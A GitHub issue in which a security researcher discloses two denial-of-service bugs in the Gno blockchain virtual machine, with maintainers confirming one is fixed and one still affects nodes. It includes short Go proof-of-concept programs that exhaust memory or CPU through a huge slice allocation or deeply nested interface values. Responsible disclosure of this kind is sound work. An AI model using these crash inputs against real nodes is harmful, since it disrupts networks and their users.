gnolang
Two critical VM issues (denial of service attacks)
Two critical VM issues (denial of service attacks)
Hey everyone, I am a Web3 cybersecurity researcher working for Hacken specializing in layer 1 protocols and virtual machines. I met with the Gno team during Web3 Summit in Berlin where they introduced me to your project. I promised to check it out because it sounded very interesting to me. I spent a day playing with your project and virtual machine and managed to find two ways to crash it.
Critical issues
- Crashing VM due to out-of-memory error by allocating a huge slice:
package main
func main() {
buffer := make([]int, 1_000_000_000_000)
buffer[1] = 1
}
- Crashing VM by creating very deep structure which is very CPU-intensive to process:
func init() {
var x interface{}
for {
x = [1]interface{}{x}
}
}
or alternatively:
package main
func main() {
var x interface{}
for i := 0; i < 10000; i++ {
x = [1]interface{}{x}
}
for i := 0; i < 10000; i++ {
println(x)
}
}
I used the following test to reproduce these issues: crash_test.go.zip. You should put it in gno.land/pkg/sdk/vm and run it there with go test -v -run TestVMCrash.
Next steps
I highly recommend introducing Fuzzing in your project and undergoing a full audit before launching your product.
Feel free to contact me here or by sending an email to [email protected] if you need any help.
I'll take a stab at solving the first issue listed here
- Crashing VM due to out-of-memory error by allocating a huge slice:
First issue has been fixed.
The second issue needs to be triaged to determine if it poses a critical threat for the chain at launch.
Confirming the second one is still an issue, sorry for the delay, and affects actual running nodes.
I'll create a second issue for the second one so we can more appropriately track it with a proper name.
